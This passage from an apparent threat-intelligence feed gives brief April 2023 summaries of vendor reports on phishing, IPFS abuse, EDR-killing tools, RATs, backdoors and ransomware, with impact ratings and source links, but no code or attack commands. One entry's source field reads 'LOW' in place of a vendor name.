- Google Threat Analysis researchers have observed that Russian government-backed phishing campaigns targeted users in Ukraine the most, with the country accounting for over 60% of observed Russian targeting.
Source:
https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/
—
- Intel Source:
- PaloAlto
- Intel Name:
- Hackers_Promptly_Adopting_Web3_IPFS_Technology
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- PaloAlto researchers have observed several types of cyberthreats using InterPlanetary File System (aka IPFS), including phishing, credential theft, command and control (C2) communications, and malicious payload distribution. Also, observed a significant jump in IPFS-related traffic at the beginning of 2022.
Source:
https://unit42.paloaltonetworks.com/ipfs-used-maliciously/
—
- Intel Source:
- NTT Security
- Intel Name:
- USB_Based_FlowCloud_Malware_Attacks
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from NTT security have observed several companies have been infected with FlowCloud. It is known as malware used by an attack group called TA410 and has been observed since around 2019.
Source:
https://insight-jp.nttsecurity.com/post/102id0t/usbflowcloud
—
- Intel Source:
- Sophos
- Intel Name:
- EDR_Killer_AuKill_Exploiting_Process_Explorer_Drivers
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- Sophos researchers have investigated multiple incidents where attackers attempted to disable EDR clients with a new defense evasion tool dubbed AuKill. The AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.
Source:
https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/
—
- Intel Source:
- CSIRT-MON
- Intel Name:
- Belarus_Linked_Hacking_Group_Targeting_Poland_With_New_Disinformation_Campaign
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- CSIRT-MON researchers have issued a warning Wednesday about a recent disinformation campaign that has been traced back to the Belarusian hacking group known as Ghostwriter.
Source:
https://csirt-mon.wp.mil.pl/pl/articles/6-aktualnosci/dezinformacja-o-rekrutacji-do-litpolukrbrig/
—
- Intel Source:
- Team-Cymru
- Intel Name:
- SideCopy_Attack_Chain_Deploying_AllaKore_RAT
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have analyzed the SideCopy group and discovered the SideCopy attack chain used to deploy AllaKore RAT. It is an open-source remote access tool that has been modified for the purposes of SideCopy operations and is commonly observed in their intrusions.
Source:
https://www.team-cymru.com/post/allakore-d-the-sidecopy-train
—
- Intel Source:
- Sucuri
- Intel Name:
- Hackers_Using_Abandoned_WordPress_Plugins_to_Backdoor_Websites
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Sucuri researchers have identified that attackers are using Eval PHP, an outdated legitimate WordPress plugin, to compromise websites by injecting stealthy backdoors.
Source:
https://blog.sucuri.net/2023/04/massive-abuse-of-abandoned-evalphp-wordpress-plugin.html
—
- Intel Source:
- Uptycs
- Intel Name:
- Hackers_From_Pakistan_Using_Linux_Malware_Poseidon_to_Target_Indian_Government_Agencies
- Date of Scan:
- 2023-04-20
- Impact:
- MEDIUM
- Summary:
- Researchers from Uptycs have identified a Pakistan-based advanced persistent threat actor known as Transparent Tribe using a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon.
Source:
https://www.uptycs.com/blog/cyber_espionage_in_india_decoding_apt_36_new_linux_malware
—
- Intel Source:
- Cyble
- Intel Name:
- New_Strain_of_Ransomware_Named_CrossLock
- Date of Scan:
- 2023-04-20
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a new strain of ransomware called CrossLock, which is written in the programming language “Go”. It employs the double-extortion technique to increase the likelihood of payment from its victims and this technique involves encrypting the victim’s data as well as exfiltrating it from their system.
—
- Intel Source:
- LOW
- Intel Name:
- Phishing_Campaign_Targeting_EPOS_Net_Customers
- Date of Scan:
- 2023-04-20
- Impact:
- LOW
- Summary:
- Cofense Phishing Defense Center have observed a sophisticated phishing campaign targeting EPOS Net customers, a large Japanese credit card company. The campaign is notable for its meticulously crafted emails and cloned website, as well as its use of official customer service numbers to establish an illusion of legitimacy.
—
- Intel Source:
- Blackberry
- Intel Name:
- Google_Ads_Abuse_and_Spear_Phishing_Campaigns_Impersonating_Spains_Tax_Agency
- Date of Scan:
- 2023-04-20
- Impact:
- LOW
- Summary:
- Researchers from BlackBerry have observed two parallel malicious campaigns that use the same infrastructure but have different purposes. The first campaign is related to a malvertising Google Ads Platform and the second campaign is related to a massive spear-phishing campaign targeting large organizations based in Spain. The campaign impersonated Spain’s tax agency, with the goal of harvesting the email credentials of companies in Spain.